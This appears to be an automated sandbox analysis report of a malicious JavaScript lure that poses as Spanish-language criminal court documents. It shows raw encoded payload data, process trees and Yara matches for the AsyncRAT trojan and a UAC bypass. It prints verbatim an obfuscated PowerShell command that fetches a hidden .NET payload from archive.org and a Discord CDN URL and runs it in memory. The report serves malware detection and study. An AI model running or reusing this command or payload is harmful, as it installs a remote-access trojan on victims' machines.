                                                                                  2025-04-26 00:53:50 UTC1014INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                  2025-04-26 00:53:50 UTC1369INData Raw: 47 62 77 42 58 59 36 4d 6a 64 74 4e 58 59 38 41 43 49 4b 30 67 50 35 52 58 61 73 6c 6d 59 70 52 58 59 77 31 32 62 6a 39 43 50 67 41 69 43 4e 34 6a 62 76 6c 47 64 68 4e 57 61 73 42 48 63 68 39 43 50 67 41 43 49 67 6f 51 44 2b 38 69 49 39 46 57 4f 68 56 54 4d 68 42 54 4e 6b 5a 47 4f 30 30 53 4e 68 6c 6a 59 74 67 54 5a 6d 52 54 4c 7a 49 6d 5a 69 31 69 4d 78 45 32 4e 6d 42 54 5a 34 73 6e 49 39 51 57 53 67 4d 31 54 6b 56 47 64 79 39 47 63 77 56 33 63 38 41 43 49 67 41 43 49 67 6f 51 44 2b 30 53 4c 67 41 54 4d 67 4d 33 64 76 52 6d 62 70 64 46 49 74 30 53 49 38 41 43 49 67 41 43 49 67 6f 51 44 2b 38 69 49 39 68 7a 4e 68 52 47 4d 6b 5a 6a 5a 77 51 32 4d 34 30 69 59 69 56 54 4f 74 6b 7a 4d 79 51 54 4c 78 55 47 4d 34 30 69 4e 33 4d 6d 4e 33 59 6a 5a 78 73 6e 49 39
                                                                                  Data Ascii: GbwBXY6MjdtNXY8ACIK0gP5RXaslmYpRXYw12bj9CPgAiCN4jbvlGdhNWasBHch9CPgACIgoQD+8iI9FWOhVTMhBTNkZGO00SNhljYtgTZmRTLzImZi1iMxE2NmBTZ4snI9QWSgM1TkVGdy9GcwV3c8ACIgACIgoQD+0SLgATMgM3dvRmbpdFIt0SI8ACIgACIgoQD+8iI9hzNhRGMkZjZwQ2M40iYiVTOtkzMyQTLxUGM40iN3MmN3YjZxsnI9
                                                                                  2025-04-26 00:53:50 UTC1369INData Raw: 41 41 67 41 41 30 41 41 41 41 41 41 41 41 41 41 41 41 55 47 41 74 42 51 59 41 34 45 41 30 42 77 59 41 55 48 41 6b 42 77 62 41 49 48 41 51 42 51 41 41 45 41 41 69 41 41 41 41 41 41 41 6c 42 41 65 41 55 47 41 75 41 67 59 41 55 48 41 30 42 77 55 41 41 41 41 6c 42 51 62 41 45 47 41 75 42 51 5a 41 77 47 41 70 42 67 52 41 77 47 41 68 42 67 62 41 6b 47 41 6e 42 51 61 41 49 48 41 50 42 51 41 41 6b 41 41 36 41 41 41 41 41 41 41 41 41 41 41 41 4d 48 41 72 42 67 63 41 45 47 41 74 42 51 5a 41 51 47 41 68 42 67 63 41 51 46 41 73 42 51 59 41 63 47 41 6c 42 41 54 41 45 41 41 42 41 67 4b 41 41 41 41 41 41 41 41 41 51 48 41 6f 42 77 5a 41 6b 47 41 79 42 51 65 41 41 48 41 76 42 77 51 41 77 47 41 68 42 77 5a 41 55 47 41 4d 42 51 41 41 45 41 41 6d 41 41 41 41 41 41 41 6c 42
                                                                                  Data Ascii: AAgAA0AAAAAAAAAAAAUGAtBQYA4EA0BwYAUHAkBwbAIHAQBQAAEAAiAAAAAAAlBAeAUGAuAgYAUHA0BwUAAAAlBQbAEGAuBQZAwGApBgRAwGAhBgbAkGAnBQaAIHAPBQAAkAA6AAAAAAAAAAAAMHArBgcAEGAtBQZAQGAhBgcAQFAsBQYAcGAlBATAEAABAgKAAAAAAAAAQHAoBwZAkGAyBQeAAHAvBwQAwGAhBwZAUGAMBQAAEAAmAAAAAAAlB
                                                                                  2025-04-26 00:53:50 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 43 41 6c 38 50 41 41 41 41 41 41 77 47 62 6b 35 53 5a 6c 4a 33 62 6a 4e 58 62 41 34 57 61 68 31 55 5a 34 56 6b 63 76 4e 30 58 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 67 44 67 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 51 41 4f 34 4b 41 41 41 41 41 41 41 41 41 41 41 51 41 4f 77 49 41 41 41 51 42 64 6b 71 67 53 55 51 48 35 45 6f 45 45 63 41 44 74 4b 59 45 78 4a 52 41 43 41 43 43 46 30 52 42 64 6b 71 67 53 67 51
                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCAl8PAAAAAAwGbk5SZlJ3bjNXbA4Wah1UZ4VkcvN0XAAAAAAAAAAAAAAAAAAAAAAAAAEgDgCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAQAO4KAAAAAAAAAAAQAOwIAAAQBdkqgSUQH5EoEEcADtKYExJRACACCF0RBdkqgSgQ
                                                                                  2025-04-26 00:53:50 UTC1369INData Raw: 34 51 56 42 4b 68 41 67 63 51 42 64 49 67 44 56 46 6f 45 42 41 69 42 46 30 52 56 42 4b 68 41 48 63 51 38 42 47 42 48 4f 45 77 41 67 67 67 41 56 46 6f 45 43 63 67 42 70 48 6f 45 42 45 41 41 47 49 41 45 4f 49 51 41 44 41 79 42 4f 6b 69 45 43 63 51 42 68 48 59 45 68 48 59 45 43 49 41 41 4a 45 65 67 52 41 41 49 46 6b 6a 45 64 41 41 41 46 6b 6a 45 49 6b 6a 45 64 4d 77 42 49 34 51 48 4f 34 67 41 41 59 41 41 54 30 42 41 67 55 41 41 54 45 51 41 67 55 67 44 42 45 6c 45 56 55 67 44 64 47 6f 45 5a 47 6f 45 4f 45 51 55 53 55 52 6b 42 4b 52 42 48 45 52 33 42 47 68 41 42 41 69 42 56 48 6f 45 42 45 41 49 47 55 64 67 53 41 41 41 46 30 51 44 42 41 41 42 4f 67 41 43 49 67 51 42 48 63 51 4e 52 55 54 45 42 41 69 42 4e 55 54 45 42 41 51 42 77 45 52 41 4b 51 41 41 65 67 51 41
                                                                                  Data Ascii: 4QVBKhAgcQBdIgDVFoEBAiBF0RVBKhAHcQ8BGBHOEwAgggAVFoECcgBpHoEBEAAGIAEOIQADAyBOkiECcQBhHYEhHYECIAAJEegRAAIFkjEdAAAFkjEIkjEdMwBI4QHO4gAAYAAT0BAgUAATEQAgUgDBElEVUgDdGoEZGoEOEQUSURkBKRBHER3BGhABAiBVHoEBEAIGUdgSAAAF0QDBAABOgACIgQBHcQNRUTEBAiBNUTEBAQBwERAKQAAegQA
                                                                                  2025-04-26 00:53:50 UTC1369INData Raw: 41 41 46 45 6e 45 46 34 67 41 41 59 51 63 53 34 51 41 41 55 41 43 78 4a 68 44 43 41 67 42 41 41 41 41 4c 51 41 41 41 41 67 43 45 41 41 41 41 6b 41 42 41 41 41 41 49 51 41 41 41 41 77 42 45 41 41 41 41 59 41 42 41 41 41 41 46 51 41 41 41 41 41 42 45 41 41 41 41 4d 41 42 41 41 41 41 41 51 41 65 52 41 41 4b 45 41 6e 45 41 67 43 42 4e 41 41 4b 44 6f 41 41 6f 4d 67 44 41 67 79 41 70 4a 42 41 67 51 41 65 52 41 41 49 45 41 6e 45 41 41 43 42 4e 45 51 41 67 51 41 44 42 45 41 49 45 49 51 41 42 41 43 42 4f 41 41 49 44 34 67 41 42 41 43 42 49 34 51 41 43 41 53 42 4f 34 51 41 43 41 53 42 46 30 42 41 67 51 51 42 64 45 51 41 67 55 51 44 41 41 79 41 4b 41 41 49 44 73 41 41 67 4d 77 43 42 45 41 49 45 6f 51 41 42 41 43 42 78 4a 52 41 42 41 53 42 4f 67 51 41 67 51 41 63 53
                                                                                  Data Ascii: AAFEnEF4gAAYQcS4QAAUACxJhDCAgBAAAALQAAAAgCEAAAAkABAAAAIQAAAAwBEAAAAYABAAAAFQAAAAABEAAAAMABAAAAAQAeRAAKEAnEAgCBNAAKDoAAoMgDAgyApJBAgQAeRAAIEAnEAACBNEQAgQADBEAIEIQABACBOAAID4gABACBI4QACASBO4QACASBF0BAgQQBdEQAgUQDAAyAKAAIDsAAgMwCBEAIEoQABACBxJRABASBOgQAgQAcS
                                                                                  2025-04-26 00:53:50 UTC1369INData Raw: 41 79 41 41 57 41 6f 44 41 77 41 77 65 50 41 41 41 67 41 51 66 41 4d 44 41 45 42 67 4f 41 41 44 41 37 39 41 41 41 49 44 41 59 56 41 41 41 34 43 41 70 41 77 51 41 45 45 41 4e 42 41 4b 41 41 43 41 6c 42 41 5a 41 38 47 41 6a 42 41 49 41 34 47 41 76 42 51 61 41 51 48 41 68 42 77 59 41 6b 47 41 30 42 67 62 41 55 47 41 6f 42 41 64 41 55 48 41 68 42 41 49 41 55 47 41 6e 42 51 59 41 4d 48 41 7a 42 51 5a 41 30 47 41 67 41 41 5a 41 6b 47 41 73 42 51 59 41 59 48 41 75 42 51 53 56 42 41 41 75 41 41 62 41 77 47 41 31 42 67 62 41 41 43 41 6c 42 67 59 41 41 43 41 30 42 77 62 41 34 47 41 67 41 67 62 41 45 47 41 6a 42 41 49 41 51 48 41 31 42 41 63 41 34 47 41 70 31 43 41 41 34 43 41 35 42 41 64 41 41 48 41 74 42 51 5a 41 41 43 41 79 42 77 62 41 41 43 41 73 42 41 62 41 55
                                                                                  Data Ascii: AyAAWAoDAwAwePAAAgAQfAMDAEBgOAADA79AAAIDAYVAAA4CApAwQAEEANBAKAACAlBAZA8GAjBAIA4GAvBQaAQHAhBwYAkGA0BgbAUGAoBAdAUHAhBAIAUGAnBQYAMHAzBQZA0GAgAAZAkGAsBQYAYHAuBQSVBAAuAAbAwGA1BgbAACAlBgYAACA0BwbA4GAgAgbAEGAjBAIAQHA1BAcA4GAp1CAA4CA5BAdAAHAtBQZAACAyBwbAACAsBAbAU
                                                                                  2025-04-26 00:53:50 UTC1369INData Raw: 69 4e 42 41 41 6b 48 41 34 42 77 62 41 49 48 41 51 42 41 62 41 77 47 41 70 42 77 53 54 41 41 41 6c 42 41 62 41 45 47 41 6a 42 77 55 41 51 48 41 6c 42 77 63 41 55 47 41 53 56 42 41 41 4d 48 41 77 42 41 62 41 77 47 41 70 42 77 61 4e 41 41 41 73 42 67 63 41 55 48 41 69 42 51 5a 41 63 58 44 41 41 41 64 41 4d 48 41 68 42 67 64 41 45 30 43 41 41 41 64 41 55 47 41 6e 42 41 62 41 73 32 43 41 41 51 4e 41 4d 44 41 30 42 51 5a 41 34 30 43 41 41 67 62 41 38 47 41 70 42 77 63 41 55 48 41 73 42 77 59 41 67 48 41 46 42 41 52 41 63 31 46 41 41 67 62 41 55 47 41 6c 42 67 63 41 4d 47 41 7a 42 41 64 41 55 47 41 6e 4e 42 41 41 73 47 41 7a 42 51 5a 41 51 47 41 35 42 67 62 41 45 32 44 41 41 77 63 41 4d 48 41 68 42 41 55 41 49 48 41 6c 42 77 63 41 63 48 41 76 42 67 63 41 49 45
                                                                                  Data Ascii: iNBAAkHA4BwbAIHAQBAbAwGApBwSTAAAlBAbAEGAjBwUAQHAlBwcAUGASVBAAMHAwBAbAwGApBwaNAAAsBgcAUHAiBQZAcXDAAAdAMHAhBgdAE0CAAAdAUGAnBAbAs2CAAQNAMDA0BQZA40CAAgbA8GApBwcAUHAsBwYAgHAFBARAc1FAAgbAUGAlBgcAMGAzBAdAUGAnNBAAsGAzBQZAQGA5BgbAE2DAAwcAMHAhBAUAIHAlBwcAcHAvBgcAIE
                                                                                  2025-04-26 00:53:50 UTC1369INData Raw: 42 51 4c 52 41 41 41 7a 42 51 5a 41 77 47 41 70 42 67 5a 41 38 47 41 79 42 41 55 41 77 46 41 34 42 77 62 41 59 47 41 6c 42 67 63 41 6b 47 41 47 42 41 58 41 45 47 41 73 42 41 62 41 6b 47 41 36 42 77 62 41 30 45 41 63 4e 44 41 41 4d 48 41 30 42 51 5a 41 77 47 41 73 42 51 59 41 63 46 41 73 42 77 62 41 38 47 41 43 64 42 41 41 41 48 41 31 42 77 62 41 49 48 41 48 74 41 41 41 63 47 41 75 42 77 62 41 41 56 43 41 41 51 5a 41 49 48 41 76 42 77 51 41 41 43 41 75 42 51 61 41 38 47 41 6a 42 41 64 41 6b 47 41 43 6c 42 41 41 55 47 41 79 42 77 62 41 4d 45 41 66 42 67 62 41 6b 47 41 76 42 77 59 41 51 48 41 70 42 67 51 5a 41 41 41 75 42 51 61 41 38 47 41 6a 42 41 64 41 6b 47 41 43 42 41 58 52 41 41 41 6c 42 77 59 41 34 47 41 68 42 67 62 41 6b 47 41 43 39 41 41 41 55 47 41
                                                                                  Data Ascii: BQLRAAAzBQZAwGApBgZA8GAyBAUAwFA4BwbAYGAlBgcAkGAGBAXAEGAsBAbAkGA6BwbA0EAcNDAAMHA0BQZAwGAsBQYAcFAsBwbA8GACdBAAAHA1BwbAIHAHtAAAcGAuBwbAAVCAAQZAIHAvBwQAACAuBQaA8GAjBAdAkGAClBAAUGAyBwbAMEAfBgbAkGAvBwYAQHApBgQZAAAuBQaA8GAjBAdAkGACBAXRAAAlBwYA4GAhBgbAkGAC9AAAUGA


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  • File
                                                                                  • Registry
                                                                                  • Network

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:20:53:33
                                                                                  Start date:25/04/2025
                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Documentos_de_la_demanda_penal_en_su_contra_juzgado_03_de_bogota_6ciu345n (7).js"
                                                                                  Imagebase:0x7ff60aca0000
                                                                                  File size:170'496 bytes
                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true
                                                                                  Show Windows behavior

                                                                                  File Activities

                                                                                  Show Windows behavior

                                                                                  Section Activities

                                                                                  Show Windows behavior

                                                                                  Registry Activities

                                                                                  Show Windows behavior

                                                                                  COM Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Thread Activities

                                                                                  Show Windows behavior

                                                                                  Memory Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Windows UI Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:20:53:42
                                                                                  Start date:25/04/2025
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$embolic = 'JABjAGgAbwBuAGQAcgBvAHMAdABvAG0AYQAgAD0AIAAnACYAZQA1ADUAMQA0ADUAMQA1AGQAOQA3ADUAOABlAGEAZgBhAGIAMQAwADIANgAzAGQAYwA1ADYAOAA1ADcAZgAxADcAZQA4ADgAMgAwAGQAOQA0ADAAMQBkAGYAYQA2ADMAOQA5ADQANQA2AGUANAA1AGUAMgBjADIANAAwAGIAZAA9AG0AaAAmADEAZgAxADAAYgAwADgANgA9AHMAaQAmADEANwAzADUAYwAwADgANgA9AHgAZQA/ACMAeAAjAC4AZQBsAGkARgBkAGUAIwByAGUAdgBuAG8AQwAvADMAOAA2ADUAMwAyADIAMwAyADcAOAA5ADYAOAA5ADQANgAzADEALwA1ADUAMgAxADcANQAwADUAMQA2ADkANQA2ADEAMQA0ADUAMwAxAC8AcwAjAG4AZQBtAGgAYwBhACMAIwBhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwACMAIwBoACcAOwAkAHAAcgBlAHMAYwByAGkAYgBpAG4AZwAgAD0AIAAkAGMAaABvAG4AZAByAG8AcwB0AG8AbQBhACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABwAHkAcgBvAGcAbgBvAHMAdABpAGMAcwAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBhAHIAYwBoAGkAdgBlAC4AbwByAGcALwBkAG8AdwBuAGwAbwBhAGQALwBuAGUAdwBfAGkAbQBhAGcAZQBfADIAMAAyADUAMAA0ADEAMwAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAbQBlAHIAYwBoAGEAbgB0AGUAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAGUAcgBjAGgAYQBuAHQAZQByAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAGgAYQBsAHQAZQByAGkAYQAgAD0AIAAkAG0AZQByAGMAaABhAG4AdABlAHIALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcAB5AHIAbwBnAG4AbwBzAHQAaQBjAHMAKQA7ACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGgAYQBsAHQAZQByAGkAYQApADsAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABmAHIAdQBpAHQAZQByAGUAcgBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAG8AdgBlAHIAZgBsAGkAZwBoAHQAcwAgAD0AIAAkAGMAYQByAHAAZQB0AGIAYQBnAGcAaQBuAGcALgBJAG4AZABlAHgATwBmACgAJAByAGgAYQBiAGQAbwBtAGEAbgB0AGkAcwB0ACkAOwAkAHAAbABlAG8AbQBhAHoAaQBhACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAEkAbgBkAGUAeABPAGYAKAAkAGYAcgB1AGkAdABlAHIAZQByAHMAKQA7ACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtAGcAdAAgACQAbwB2AGUAcgBmAGwAaQBnAGgAdABzADsAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAIAArAD0AIAAkAHIAaABhAGIAZABvAG0AYQBuAHQAaQBzAHQALgBMAGUAbgBnAHQAaAA7ACQAQgB1AHgAdQBzACAAPQAgACQAcABsAGUAbwBtAGEAegBpAGEAIAAtACAAJABvAHYAZQByAGYAbABpAGcAaAB0AHMAOwAkAGIAbABpAG4AZwB5ACAAPQAgACQAYwBhAHIAcABlAHQAYgBhAGcAZwBpAG4AZwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABvAHYAZQByAGYAbABpAGcAaAB0AHMALAAgACQAQgB1AHgAdQBzACkAOwAkAFQAaQB0AGEAbgBpAGEAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGwAaQBuAGcAeQApADsAJABtAGUAbAB0AGkAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFQAaQB0AGEAbgBpAGEAbgApADsAJAByAG8AcwB0AHIAYQB0AHUAbABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcAByAGUAcwBjAHIAaQBiAGkAbgBnACwAJwAxACcALAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAJwAsACcAZgBsAHUAYwB0AHUAbwB1AHMAJwAsACcATQBTAEIAdQBpAGwAZAAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAJwAsACcAMgAnACwAJwAnACkAKQA=' -replace '','';$tempiettos = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($embolic));Invoke-Expression $tempiettos;"
                                                                                  Imagebase:0x7ff7016f0000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000002.00000002.1288245604.0000013D95F29000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1352353205.0000013DAC470000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1313016368.0000013DA4D4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true
                                                                                  Show Windows behavior

                                                                                  File Activities

                                                                                  Show Windows behavior

                                                                                  Section Activities

                                                                                  Show Windows behavior

                                                                                  Registry Activities

                                                                                  Powershell Activities

                                                                                  Show Windows behavior

                                                                                  Mutex Activities

                                                                                  Show Windows behavior

                                                                                  Process Activities

                                                                                  Show Windows behavior

                                                                                  Thread Activities

                                                                                  Show Windows behavior

                                                                                  Memory Activities

                                                                                  Show Windows behavior

                                                                                  System Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Windows UI Activities

                                                                                  Process Token Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:20:53:42
                                                                                  Start date:25/04/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff62fc20000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false
                                                                                  Show Windows behavior

                                                                                  File Activities

                                                                                  Show Windows behavior

                                                                                  Section Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Mutex Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Thread Activities

                                                                                  Show Windows behavior

                                                                                  Memory Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Windows UI Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:20:53:47
                                                                                  Start date:25/04/2025
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\fluctuous.js"
                                                                                  Imagebase:0x7ff72c240000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true
                                                                                  Show Windows behavior

                                                                                  File Activities

                                                                                  Show Windows behavior

                                                                                  Section Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Process Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:20:53:47
                                                                                  Start date:25/04/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff62fc20000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true
                                                                                  Show Windows behavior

                                                                                  File Activities

                                                                                  Show Windows behavior

                                                                                  Section Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Mutex Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Thread Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                  Show Windows behavior

                                                                                  Windows UI Activities

                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:20:53:48
                                                                                  Start date:25/04/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                  Imagebase:0xbb0000
                                                                                  File size:262'432 bytes
                                                                                  MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000002.2427138084.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  Reputation:high
                                                                                  Has exited:false
                                                                                  Show Windows behavior

                                                                                  File Activities

                                                                                  Show Windows behavior

                                                                                  Section Activities

                                                                                  Show Windows behavior

                                                                                  Registry Activities

                                                                                  Show Windows behavior

                                                                                  Mutex Activities

                                                                                  Show Windows behavior

